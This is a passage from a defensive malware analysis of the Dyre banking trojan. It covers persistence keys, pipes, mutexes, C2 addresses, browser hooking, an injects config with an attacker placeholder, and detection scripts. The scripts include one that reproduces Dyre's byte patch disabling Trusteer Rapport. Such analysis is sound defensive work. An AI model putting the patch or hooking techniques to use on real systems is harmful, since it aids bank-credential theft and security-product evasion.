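    region = build_test_region(build_test_pe(0x53860FB3, [(b".text", b"\xCC" * 100), (b".data", b"D" * 20)]))
    print("loader at %#x" % find_loader(region))
    for img in carve_images(region):
        print("PE at %#x: %d raw bytes, stamp %#x, sections %s"
              % (img["offset"], img["raw_size"], img["timestamp"], [s[0] for s in img["sections"]]))
```

On a real dump, feed carve_images the bytes of each RWX region from the table above; write file_bytes to disk for the stage 5 payload, and use size_of_image when the region holds the already mapped stage 6 DLL, since its sections are then laid out at their virtual addresses rather than their raw offsets.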

Stage 7

The last stage is the DLL injected into a browser such as iexplore.exe, firefox.exe or chrome.exe. This stage will only be reached if Dyre has been able to connect to the internet. The injected DLL contains 170+ functions. The functions range from creating hooks in the browsers (see Hooks) to monitor traffic, communicating with the main Dyre executable via named pipes, rerouting traffic, etc. The injected memory has the below characteristics.

  Private (Commit)   0xa00000   96 kB   RWX+G

General Details and Functionality

Persistence

Dyre uses the registry to survive a reboot.

Registry

Service

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate]
  "Type"=dword:00000010                  ; SERVICE_WIN32_OWN_PROCESS
  "Start"=dword:00000002                 ; SERVICE_AUTO_START
  "ErrorControl"=dword:00000001          ; SERVICE_ERROR_NORMAL
  "ImagePath"=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,43,48,55,6e,46,61,57,4c,67,66,4a,54,42,64,77,2e,65,78,65,00
                                         ; decodes to "C:\WINDOWS\CHUnFaWLgfJTBdw.exe"
  "DisplayName"="Google Update Service"
  "ObjectName"="LocalSystem"

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate\Security]
  "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

Run Key

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  "GoogleUpdate"="C:\Documents and Settings\Administrator\Application Data\googleupdaterr.exe"

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
  @="C:\Documents and Settings\Administrator\Application Data\EDPBxttMFiiCodB.exe"
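The stage 4 note about alerting on autorun entries that point into %APPDATA%, together with the service and Run key values above, can be turned into a check over a registry export. The script below is an added example for this report, not code from the report or from Dyre: it parses .reg text (including hex(2) values, which Regedit writes as UTF-16LE but some dump tools write as ANSI, as in the ImagePath above) and flags three things: a Run/RunOnce value whose path is under Application Data or AppData\Roaming, a service whose binary name is 15 random letters plus .exe as the report describes, and, as an added heuristic of my own, a service binary sitting directly in the Windows root. SAMPLE_REG is constructed from the keys shown above in .reg syntax plus one benign entry for contrast.

```python
"""Flag Dyre-style persistence in a Windows registry export.

Added example for this report. SAMPLE_REG is constructed from the keys shown above,
written in .reg syntax (doubled backslashes); it is not a capture from a real host.
"""
import re

APPDATA_RE = re.compile(r"\\(Application Data|AppData\\Roaming)\\", re.IGNORECASE)
RANDOM_EXE_RE = re.compile(r"^[A-Za-z]{15}\.exe$")          # 15 random letters, as in the report
WINROOT_EXE_RE = re.compile(r"^[A-Za-z]:\\windows\\[^\\]+\.exe$", re.IGNORECASE)  # added heuristic
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
SERVICES_PREFIX = "hkey_local_machine\\system\\currentcontrolset\\services\\"

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate]
"Type"=dword:00000010
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,43,48,55,6e,46,61,57,4c,67,66,4a,\
  54,42,64,77,2e,65,78,65,00
"DisplayName"="Google Update Service"
"ObjectName"="LocalSystem"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"GoogleUpdate"="C:\\Documents and Settings\\Administrator\\Application Data\\googleupdaterr.exe"
@="C:\\Documents and Settings\\Administrator\\Application Data\\EDPBxttMFiiCodB.exe"
"Updater"="C:\\Program Files\\Vendor\\updater.exe"
'''


def decode_reg_value(raw):
    """(type, value) for one .reg value: "string", dword:..., hex:... or hex(n):..."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return "sz", raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if raw.lower().startswith("dword:"):
        return "dword", int(raw[6:], 16)
    m = re.match(r"hex(?:\((\d+)\))?:(.*)", raw, re.IGNORECASE)
    if m:
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
        kind = int(m.group(1) or 3)
        if kind in (1, 2, 7):                     # REG_SZ / REG_EXPAND_SZ / REG_MULTI_SZ
            # Regedit writes UTF-16LE; the dump above carries the ANSI string instead.
            if len(data) % 2 == 0 and all(b == 0 for b in data[1::2]):
                text = data.decode("utf-16-le")
            else:
                text = data.decode("latin-1")
            return ("expand_sz" if kind == 2 else "sz"), text.rstrip("\0")
        return "binary", data
    return "raw", raw


def parse_reg(text):
    """{key path: {value name: (type, value)}}; '@' is the default value."""
    keys, current, pending = {}, None, ""
    for line in text.splitlines():
        line = pending + line.strip()
        pending = ""
        if line.endswith("\\"):                   # hex data continued on the next line
            pending = line[:-1]
            continue
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, raw = line.partition("=")
        keys[current][name if name == "@" else name.strip('"')] = decode_reg_value(raw)
    return keys


def _exe_from_command(cmd):
    """Binary path of a service/run command line, quoted or not, arguments dropped."""
    m = re.match(r'\s*"([^"]+)"|\s*(.+?\.exe)', cmd, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else cmd.strip()


def find_persistence(keys):
    """(key, value name, path, reason) for every suspicious autorun or service."""
    findings = []
    for key, values in keys.items():
        if RUN_KEY_RE.search(key):
            for name, (_, data) in values.items():
                if isinstance(data, str) and APPDATA_RE.search(data):
                    findings.append((key, name, data, "autorun points into %APPDATA%"))
        elif key.lower().startswith(SERVICES_PREFIX) and "ImagePath" in values:
            path = values["ImagePath"][1]
            if not isinstance(path, str):
                continue
            exe = _exe_from_command(path)
            if RANDOM_EXE_RE.match(exe.rsplit("\\", 1)[-1]):
                findings.append((key, "ImagePath", exe, "service binary has a random 15-letter name"))
            elif WINROOT_EXE_RE.match(exe):
                findings.append((key, "ImagePath", exe, "service binary sits directly in the Windows root"))
    return findings


if __name__ == "__main__":
    for finding in find_persistence(parse_reg(SAMPLE_REG)):
        print("%s | %s = %s | %s" % finding)
```

To run it against a live system, export the two hives with reg export (or collect the hives from a forensic image and dump them with a hive parser) and pass the text to parse_reg; the RANDOM_EXE_RE check also catches the dropped-file names listed below.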

Dropped Files

Service version, Windows XP:

  C:\WINDOWS\38f4f489bd7.INI                                                1 KB
  C:\WINDOWS\CHUnFaWLgfJTBdw.exe                                            439 KB **
  C:\WINDOWS\CHUnFaWLgfJTBdw.INI                                            1 KB
  C:\WINDOWS\system32\config\systemprofile\Application Data\2ete64.vas      2 KB

** The executable with the 15 random upper or lower case chars is the most common.

XRider version, Windows XP:

  C:\Documents and Settings\Administrator\Application Data\cmd.exe          291 KB
  C:\Documents and Settings\Administrator\Application Data\userdata.dat     1 KB

diper89 version, Windows XP:

  C:\Documents and Settings\Administrator\Application Data\googleupdaterr.exe     257 KB
  C:\Documents and Settings\Administrator\Application Data\userdata.dat           1 KB
  C:\Documents and Settings\Administrator\Application Data\EDPBxttMFiiCodB.exe    451 KB
  C:\WINDOWS\system32\config\systemprofile\Application Data\d6r5g4da.db           1 KB
  C:\WINDOWS\.INI                                                                 1 KB

Pipes

The injected process communicates with the main process using named pipes. The names are hardcoded, similar to the mutexes. The pipe is created in stage 6.

  seg000:00A05044     push    0
  seg000:00A05046     push    0
  seg000:00A05048     push    3                        ; OPEN_EXISTING
  seg000:00A0504A     push    0
  seg000:00A0504C     push    0
  seg000:00A0504E     push    0C0000000h               ; GENERIC_READ | GENERIC_WRITE
  seg000:00A05053     push    offset a_PipeCmvn5e4d4   ; "\\\\.\\pipe\\cmvn5e4d4r"
  seg000:00A05058     call    ebx                      ; CreateFileW
  seg000:00A0505A     mov     esi, eax

It uses the named pipe to pass commands and variables back and forth. Within the injected process there are a number of different requested variables: "btid", "ccsr", "btnt", "slip", "newp", "slpr" and "ppsr".

  \\.\pipe\Xider78Pipe
  \\.\pipe\cmvn5e4d4r
  \\.\pipe\Diper89Pipe
  \\.\pipe\net\NtControlPipe10

Mutex

The mutexes are hardcoded and are generated during stage 6. The below mutexes were found via OSINT.

  Global\1g2hk1hyj
  Global\553wwerdty7
  Global\cdv5b74f5y7
  Xider78
  Diper89

Functionality Overview

This section contains generic functionality that Dyre is capable of. There is room for improvement in regards to the networking.

Enumerating processes

Calls CreateToolhelp32Snapshot to get a snapshot of all running processes. For each process name it calls StrStrIW to see if the searched process matches. If not, it calls Process32NextW to get the next process name. In stage 4 explorer.exe or svchost.exe is searched for. In stage 6 the injected process searches for chrome.exe, firefox.exe and/or iexplore.exe.

Process Injection

The process injection uses NtMapViewOfSection, VirtualAlloc, NtQuerySystemInformation, OpenThread and NtQueueApcThread rather than the standard WriteProcessMemory, SetThreadContext and CreateRemoteThread.

Host IP Retrieval

Gets the IP from a STUN server or a third party service. Please see the section Network Traffic Patterns for more details.

VNC

The code responsible for VNC is a separate module. It is not present in the executable. The module looks to be a DLL that has three known exports: ClientSetModule, VncStartServer and VncStopServer. The latter export names are present in the Carberp source leak at Carberp/source - absource/pro/all source/hvnc_dll/HVNCLib/hvnc.h. There is the possibility this is a modified version of the leaked code but without the module there is no way to know for sure. This same function is also used for the tv32 command. The modules are internally named VNCModule and TVModule.

Other functionality not worth researching:

  Decrypting of files stored as RCDATA in the resources
  Creation and execution of files in the %TEMP% directory
  Stores configuration in a log file
  Requires having SeDebugPrivilege rights
  Collects information about the host
  Redirects

Commands & Configurations

Some of these are internal commands that are passed through the named pipe while others are commands from the command and control.

  sfile          send file
  logkeys
  logpost        log POST requests
  cert
  vnc32
  tv32
  bcc
  browsnapshot
  generalinfo
  httprdc
  btid           passed on the pipe
  ccsr
  btnt
  slip
  pls
  spp
  setp
  newp           new process
  slpr
  ppsr

Injects Configurations

The configurations for the browser injects are stored as XML. These are used in stage 7 in the injected process. There are three parent tags: serverlist, localitems and rpci.

  BANK_URL  ATTACKER_IP:PORT
  SUB.BANK_URL.com/FOLDER/*
  SUB.BANK_URL1.com/FOLDER/*
  SUB.BANK_URL2.com/FOLDER/*

Unfortunately I could not find an example for rpci.

Error Codes

Dyre has extensive error handling and feedback for the developers. Error handling functionality can be found throughout the code.

  0FCC20002h   Chrome PE parsing failed
  0FCC20000h   Unknown, Chrome related
  0FCC10001h   FireFox hook failed
  0FCC10000h   Unknown, FireFox related
  0FCCC0001h   Internet Explorer WinInet hook failed
  0FCCC0000h   Internet Explorer WinInet parsing failed or timestamp not found

Hooks

Process specific hooks for logging browser traffic. The hooks happen in stage 7, in the injected process. The injected process name will be firefox.exe, chrome.exe or iexplore.exe.

FireFox Hooks

The sample uses the standard approach to hook traffic in Firefox. It attempts to load NSPR4.DLL or NSS3.DLL. It will then call GetProcAddress to get the addresses and add an inline hook for the following APIs.

  PR_Read
  PR_Write
  PR_Close

Parses the below if PR_Write is called:

  GET
  PUT
  POST

Parses the below if PR_Read is called:

  HTTP
  HTTPS
  POST

The hooking of PR_Read and PR_Write has been used by malware since at least December of 2009, and likely earlier: the first post discussing this technique was by a user named oxman on the Mozilla forums in January of 2007.

Internet Explorer Hooks

The first two hooks use a GetProcAddress approach to find the addresses of LoadLibraryExW and CreateProcessInternalW. When hooking WinInet.dll Dyre does something rather unique. It does this to bypass heuristic based detection. Dyre will read the timestamp of WinInet.dll and then compare it to a list of other timestamps for WinInet.dll. The list contains every timestamp for WinInet.dll from '2004-08-04 01:53:22' to '2014-07-25 04:04:59'. Each timestamp is followed by a dword index.

  seg000:00A0C05F                 db 0
  seg000:00A0C060 TimeStampList   dd 4110941Bh         ; DATA XREF: TimeStamp:_loop r
  seg000:00A0C064 dword_A0C064    dd 0                 ; DATA XREF: TimeStamp+1C r
  seg000:00A0C064                                      ; TimeStamp:loc_A07A0D r
  seg000:00A0C068                 dd 411095F2h
  ...
  seg000:00A0D234                 dd 78h
  seg000:00A0D238                 dd 53860FB3h
  seg000:00A0D23C                 dd 79h
  seg000:00A0D240                 dd 53D22BCBh
  seg000:00A0D244                 dd 7Ah

  >>> datetime.datetime.fromtimestamp(0x411095F2).strftime('%Y-%m-%d %H:%M:%S')
  '2004-08-04 01:53:22'
  >>> datetime.datetime.fromtimestamp(0x53D22BCB).strftime('%Y-%m-%d %H:%M:%S')
  '2014-07-25 04:04:59'

Note that datetime.fromtimestamp converts to the local time zone of the analysis machine; the two stamps are 2004-08-04 07:53:22 and 2014-07-25 10:04:59 in UTC. Pass datetime.timezone.utc as the second argument to get a machine independent value when comparing against other reports.

If an error occurs during the parsing process the sample will check if the hash of the DLL is known to the server. If not, it will use the "sfile" command to send the file back to the command and control.

  '/%s/%s/63/file/%s/%s/%s/'
  "Check wininet.dll on server failed"
  "Send wininet.dll failed"

If the timestamp is found, the dword that follows it is used as an index to grab the address of where the hook should happen. For example if the timestamp was 4802A13Ah it would be found at the 49th entry.

  seg000:00A0C1E8                 dd 4802A13Ah

The resulting hook in WinInet.dll is a 5-byte JMP into Dyre's injected memory:

  77200F3B  90              NOP
  77200F3C  E9 C7F0398A     JMP 015A0008
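The timestamp table above is a lookup from IMAGE_FILE_HEADER.TimeDateStamp to a hook index, and the interesting case for a defender is what happens when the build is not in it (the hash check and "sfile" upload). The Python below is an added example for this report, not Dyre's code: it rebuilds a small version of the table from the dwords visible in the listing, reads the timestamp out of a PE header the way Dyre has to, looks it up, and renders the stamps in UTC. Only the timestamps are from the listing; the hook indices for 0x411095F2 and 0x4802A13A are not visible in the report and are filled in for the example, and build_header produces a constructed PE header rather than a real WinInet.dll.

```python
"""Look up a WinInet.dll build in Dyre's (timestamp, hook index) table.

Added example for this report. TABLE is rebuilt from the listing above: the timestamps
are the ones visible in the listing; indices without a visible dword are filled in.
"""
import struct
from datetime import datetime, timezone

TABLE = struct.pack("<10I",
                    0x4110941B, 0x00,   # first entry of the listing, index 0
                    0x411095F2, 0x01,   # listing timestamp; index filled in
                    0x4802A13A, 0x31,   # listing timestamp (entry at A0C1E8); index filled in
                    0x53860FB3, 0x79,   # listing
                    0x53D22BCB, 0x7A)   # last entry of the listing


def parse_table(blob):
    """{TimeDateStamp: hook index} from the packed dword pairs."""
    return dict(struct.iter_unpack("<II", blob))


def pe_timestamp(image):
    """IMAGE_FILE_HEADER.TimeDateStamp of a PE image (file or mapped)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[:2] != b"MZ" or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    return struct.unpack_from("<I", image, e_lfanew + 8)[0]


def stamp_to_utc(ts):
    """Machine independent rendering; datetime.fromtimestamp(ts) alone uses local time."""
    return datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def classify(image, blob=TABLE):
    """What Dyre decides for this WinInet.dll: hook via the table entry, or fall back to
    the server-side hash check and the 'sfile' upload when the build is unknown."""
    ts = pe_timestamp(image)
    idx = parse_table(blob).get(ts)
    action = "hook via table entry" if idx is not None else "unknown build: check hash, sfile upload"
    return {"timestamp": ts, "utc": stamp_to_utc(ts), "hook_index": idx, "action": action}


def build_header(timestamp):
    """Constructed MZ/PE header carrying only the fields classify() reads (test input)."""
    hdr = bytearray(0x58)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                  # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHI", hdr, 0x44, 0x14C, 4, timestamp)  # Machine, NumberOfSections, TimeDateStamp
    return bytes(hdr)


if __name__ == "__main__":
    for ts in (0x411095F2, 0x4802A13A, 0x53D22BCB, 0x12345678):
        print(hex(ts), classify(build_header(ts)))
```

For a real check, read the bytes of the WinInet.dll on a suspect host (or the mapped copy in a browser dump) and pass them to classify; a build newer than 2014-07-25 falls outside the table, which is exactly the case in which this sample would ship the DLL to its operators.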
Anti-Detection functionality

  The first stage is randomized and typically has a low detection score.
  Process injection of a DLL that is not listed as a loaded module.
  Disabling/patching of Trusteer Rapport in the injected process. This happens in stage 7.

Please see below for more details.

Disabling RapportGP

Checks if RapportGP.dll is a loaded module within the browser. If found it searches for a set of bytes and then patches them. The two byte patterns and the replaced bytes can be found below.

First bytes searched:

  seg000:00A0C000  8B C6                  mov     eax, esi
  seg000:00A0C002  8B 4C 24 50            mov     ecx, [esp+50h]
  seg000:00A0C006  64 89 0D 00 00 00 00   mov     large fs:0, ecx
  seg000:00A0C00D  59                     pop     ecx
  seg000:00A0C00E  5F                     pop     edi
  seg000:00A0C00F  5E                     pop     esi
  seg000:00A0C010  5B                     pop     ebx
  seg000:00A0C011  8B E5                  mov     esp, ebp
  seg000:00A0C013  5D                     pop     ebp
  seg000:00A0C014  C2 04 00               retn    4

First bytes patched:

  seg000:00A0C018  31 C0                  xor     eax, eax
  seg000:00A0C01A  8B 4C 24 50            mov     ecx, [esp+arg_4C]
  seg000:00A0C01E  64 89 0D 00 00 00 00   mov     large fs:0, ecx
  seg000:00A0C025  59                     pop     ecx
  seg000:00A0C026  5F                     pop     edi
  seg000:00A0C027  5E                     pop     esi
  seg000:00A0C028  5B                     pop     ebx
  seg000:00A0C029  8B E5                  mov     esp, ebp
  seg000:00A0C02B  5D                     pop     ebp
  seg000:00A0C02C  C2 04 00               retn    4

Second bytes searched:

  seg000:00A0C030  8B C6                  mov     eax, esi
  seg000:00A0C032  8B 4C 24 58            mov     ecx, [esp+58h]
  seg000:00A0C036  64 89 0D 00 00 00 00   mov     large fs:0, ecx
  seg000:00A0C03D  59                     pop     ecx
  seg000:00A0C03E  5F                     pop     edi
  seg000:00A0C03F  5E                     pop     esi
  seg000:00A0C040  5B                     pop     ebx
  seg000:00A0C041  8B E5                  mov     esp, ebp
  seg000:00A0C043  5D                     pop     ebp
  seg000:00A0C044  C2 04 00               retn    4

Second bytes patched:

  seg000:00A0C048  31 C0                  xor     eax, eax
  seg000:00A0C04A  8B 4C 24 58            mov     ecx, [esp+58h]
  seg000:00A0C04E  64 89 0D 00 00 00 00   mov     large fs:0, ecx
  seg000:00A0C055  59                     pop     ecx
  seg000:00A0C056  5F                     pop     edi
  seg000:00A0C057  5E                     pop     esi
  seg000:00A0C058  5B                     pop     ebx
  seg000:00A0C059  8B E5                  mov     esp, ebp
  seg000:00A0C05B  5D                     pop     ebp
  seg000:00A0C05C  C2 04 00               retn    4

Only the first two bytes of each epilogue change: mov eax, esi becomes xor eax, eax, so the patched Rapport function always returns zero instead of the value it computed in esi. Comparing the in-memory epilogues of RapportGP.dll against the on-disk copy is therefore a direct way to spot this patch in a browser process.
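Because the patch is a fixed two-byte change at a fixed byte pattern, it is easy both to reproduce for a test image and to look for in a dumped browser process. The Python below is an added example for this report, not Dyre's code: the two "searched" and "patched" sequences are the ones listed above (the [esp+50h] and [esp+58h] variants), find_epilogues reports every occurrence and whether it is in its original or patched state, and apply_dyre_patch performs the same overwrite Dyre does so the detector can be exercised. build_test_image is a constructed stand-in for a mapped RapportGP.dll, not real Trusteer code.

```python
"""Detect or reproduce Dyre's RapportGP.dll epilogue patch.

Added example for this report, not Dyre's code. The byte patterns are the two
"searched" and "patched" sequences listed above; the module image is constructed.
"""
# mov ecx,[esp+disp] ; mov large fs:0,ecx ; pop ecx ; pop edi ; pop esi ; pop ebx ; mov esp,ebp ; pop ebp ; retn 4
EPILOGUE_TAIL = bytes.fromhex("64890d00000000" "595f5e5b" "8be5" "5d" "c20400")
ORIGINAL_HEAD = bytes.fromhex("8bc6")   # mov eax, esi  (return the computed value)
PATCHED_HEAD = bytes.fromhex("31c0")    # xor eax, eax  (always return 0)
DISPLACEMENTS = (0x50, 0x58)            # the two variants Dyre searches for


def epilogue(head, disp):
    """Full 23-byte epilogue for one head and one [esp+disp] displacement."""
    return head + bytes([0x8B, 0x4C, 0x24, disp]) + EPILOGUE_TAIL


def find_epilogues(image):
    """Sorted (offset, displacement, 'original'|'patched') for every epilogue present."""
    hits = []
    for disp in DISPLACEMENTS:
        for head, state in ((ORIGINAL_HEAD, "original"), (PATCHED_HEAD, "patched")):
            pat = epilogue(head, disp)
            pos = image.find(pat)
            while pos != -1:
                hits.append((pos, disp, state))
                pos = image.find(pat, pos + 1)
    return sorted(hits)


def is_rapport_patched(image):
    """True when at least one epilogue carries Dyre's xor eax, eax head."""
    return any(state == "patched" for _, _, state in find_epilogues(image))


def apply_dyre_patch(image):
    """What stage 7 does to RapportGP.dll: overwrite the first two bytes of each
    matching epilogue. Returns (patched image, number of patches applied)."""
    out, count = bytearray(image), 0
    for disp in DISPLACEMENTS:
        pat = epilogue(ORIGINAL_HEAD, disp)
        pos = out.find(pat)
        while pos != -1:
            out[pos:pos + 2] = PATCHED_HEAD
            count += 1
            pos = out.find(pat, pos + 1)
    return bytes(out), count


def build_test_image():
    """Constructed stand-in for a mapped RapportGP.dll containing both epilogues."""
    filler = bytes.fromhex("cc") * 64
    return filler + epilogue(ORIGINAL_HEAD, 0x50) + filler + epilogue(ORIGINAL_HEAD, 0x58) + filler


if __name__ == "__main__":
    clean = build_test_image()
    dirty, n = apply_dyre_patch(clean)
    print("before:", find_epilogues(clean))
    print("after :", find_epilogues(dirty), "patches:", n)
```

Run find_epilogues over the RapportGP.dll region of a browser memory dump; a "patched" hit in memory where the on-disk file shows "original" is the Dyre modification, and the offsets tell you which of the two functions was hit.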

Command and Control

Third Party Resources

  abuse.ch SSL Fingerprint Blacklist for Suricata
  https://sslbl.abuse.ch/blacklist/sslblacklist.rules

URLs & IPs

The below IPs were extracted from memory dumps of Dyre samples. This is a small set.

  188.165.209.117:19001   https://www.virustotal.com/en/ip-address/188.165.209.117/information/
  188.165.214.17:19000    https://www.virustotal.com/en/ip-address/188.165.214.17/information/
  188.165.216.217:19000   https://www.virustotal.com/en/ip-address/188.165.216.217/information/
  216.55.182.19:19000     https://www.virustotal.com/en/ip-address/216.55.182.19/information/
  37.59.42.107:19000      https://www.virustotal.com/en/ip-address/37.59.42.107/information/
  94.23.0.200:19000       https://www.virustotal.com/en/ip-address/94.23.0.200/information/
  94.23.2.19:19000        https://www.virustotal.com/en/ip-address/94.23.2.19/information/
  94.23.221.154:19000     https://www.virustotal.com/en/ip-address/94.23.221.154/information/
  94.23.236.54:15000      https://www.virustotal.com/en/ip-address/94.23.236.54/information/

Network Traffic Patterns

When testing the network connection it will make a request to google.com or microsoft.com. The initial URL is chosen randomly. It will attempt to check the connection for a minute and a half.

No.  Time        Source           Destination      Protocol  Length  Info
57   203.133562  192.168.195.129  74.125.225.164   TCP       62      remote-as > http [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1
58   203.187092  74.125.225.164   192.168.195.129  TCP       60      http > remote-as [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
59   203.188628  192.168.195.129  74.125.225.164   TCP       54      remote-as > http [ACK] Seq=1 Ack=1 Win=64240 Len=0
69   210.736318  192.168.195.129  74.125.225.164   TCP       54      remote-as > http [FIN, ACK] Seq=1 Ack=1 Win=64240 Len=0
70   210.747798  74.125.225.164   192.168.195.129  TCP       60      http > remote-as [ACK] Seq=1 Ack=2 Win=64239 Len=0
71   210.787583  74.125.225.164   192.168.195.129  TCP       60      http > remote-as [FIN, PSH, ACK] Seq=1 Ack=2 Win=64239 Len=0
72   210.787877  192.168.195.129  74.125.225.164   TCP       54      remote-as > http [ACK] Seq=2 Ack=2 Win=64240 Len=0

Once it can verify the machine has a connection it will try to get the machine's IP address through a request to a STUN (Session Traversal Utilities for NAT) server. Dyre will randomly choose one of the following STUN servers.

stun1.voiceeclipse.net
stun.callwithus.com
stun.sipgate.net
stun.ekiga.net
stun.ideasip.com
stun.internetcalls.com
stun.noc.ams-ix.net
stun.phonepower.com
stun.voip.aebc.com
stun.voipbuster.com
stun.voxgratia.org
stun.ipshka.com
stun.faktortel.com.au
stun.iptel.org
stun.voipstunt.com
stunserver.org
203.183.172.196:3478
s1.taraba.net
s2.taraba.net
stun.l.google.com:19302
stun1.l.google.com:19302
stun2.l.google.com:19302
stun3.l.google.com:19302
stun4.l.google.com:19302
stun.schlund.de
stun.rixtelecom.se
stun.voiparound.com
numb.viagenie.ca
stun.stunprotocol.org
stun.2talk.co.nz

From a SOC perspective, rules could be created for a DNS request to google.com or microsoft.com followed by a connection to one of the above STUN servers. If the initial request is google.com it would be obvious not to flag on a connection to a Google-hosted STUN server. While searching for samples I found it rare to see non-malicious executables connect to the non-Google STUN servers. If the attempt to get the machine's IP using a STUN server fails, it will use a third-party site, icanhazip.com, to return the IP address.
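The correlation rule described above, written out as an added Python example (not from the original report): it pairs a google.com or microsoft.com lookup with a later STUN or icanhazip.com contact from the same source inside the report's minute-and-a-half window, and skips Google-hosted STUN servers when the lookup was google.com. The log format and the log lines are constructed for the example; the host names are the ones listed above.

```python
"""Correlate Dyre's google.com/microsoft.com check with its STUN lookup. Hosts are the
ones in the report; log lines ("<seconds> <src> dns|conn <host[:port]>") are constructed."""
CHECK_HOSTS = {"google.com", "microsoft.com"}
GOOGLE_STUN = {f"stun{n}.l.google.com" for n in ("", "1", "2", "3", "4")}
STUN_HOSTS = GOOGLE_STUN | {
    "stun1.voiceeclipse.net", "stun.callwithus.com", "stun.sipgate.net",
    "stun.ekiga.net", "stun.ideasip.com", "stun.internetcalls.com",
    "stun.noc.ams-ix.net", "stun.phonepower.com", "stun.voip.aebc.com",
    "stun.voipbuster.com", "stun.voxgratia.org", "stun.ipshka.com",
    "stun.faktortel.com.au", "stun.iptel.org", "stun.voipstunt.com",
    "stunserver.org", "203.183.172.196", "s1.taraba.net", "s2.taraba.net",
    "stun.schlund.de", "stun.rixtelecom.se", "stun.voiparound.com",
    "numb.viagenie.ca", "stun.stunprotocol.org", "stun.2talk.co.nz",
    "icanhazip.com",  # fallback used when every STUN attempt fails
}
WINDOW = 90.0  # the connectivity check runs for about a minute and a half

def correlate(lines, window=WINDOW):
    """Return (src, host, delay) for each STUN/icanhazip.com contact that follows
    a google.com or microsoft.com lookup by the same source within `window`."""
    last_check = {}  # src -> (time, host looked up)
    alerts = []
    for line in lines:
        ts, src, kind, host = line.split()
        ts, host = float(ts), host.split(":")[0].lower()  # drop the port
        if kind == "dns" and host in CHECK_HOSTS:
            last_check[src] = (ts, host)
        elif kind == "conn" and host in STUN_HOSTS and src in last_check:
            t0, check_host = last_check[src]
            if host in GOOGLE_STUN and check_host == "google.com":
                continue  # report: Google STUN after a google.com lookup is noise
            if 0 <= ts - t0 <= window:
                alerts.append((src, host, round(ts - t0, 3)))
    return alerts

# Constructed log: one hit, then three contacts the rule should ignore.
SAMPLE_LOG = [
    "100.0 192.168.195.129 dns google.com",
    "103.5 192.168.195.129 conn stun.sipgate.net:3478",
    "200.0 192.168.195.130 dns google.com",
    "201.0 192.168.195.130 conn stun.l.google.com:19302",
    "300.0 192.168.195.131 conn stun.ekiga.net:3478",
    "400.0 192.168.195.132 dns microsoft.com",
    "600.0 192.168.195.132 conn icanhazip.com:80",
]

if __name__ == "__main__":
    for src, host, delay in correlate(SAMPLE_LOG):
        print(f"ALERT {src} -> {host} {delay}s after connectivity check")
```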

Appendix: Strings

Stage 6 - Dyre

Stage 7 - Injected Process

Third Party Analysis

http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl
http://blog.spiderlabs.com/2014/07/analysis-of-a-banking-trojan-spammed-by-cutwail.html
https://techhelplist.com/index.php/spam-list/511-sage-accounting-invoice-nnn-virus
http://www.proofpoint.com/threatinsight/posts/dyreza-as-a-service.php
http://thegoldenmessenger.blogspot.com/2014/07/dyre-banker-aka-cdil-aka-win32win64.html
http://www.virusradar.com/en/Win32_Battdil/chart/history
http://stopmalvertising.com/malware-reports/analysis-of-dyreza-changes-network-traffic.html
http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-dyre-malware-part-1/

Oldest discussion on FireFox hooking:
http://forums.mozillazine.org/viewtopic.php?t=514691
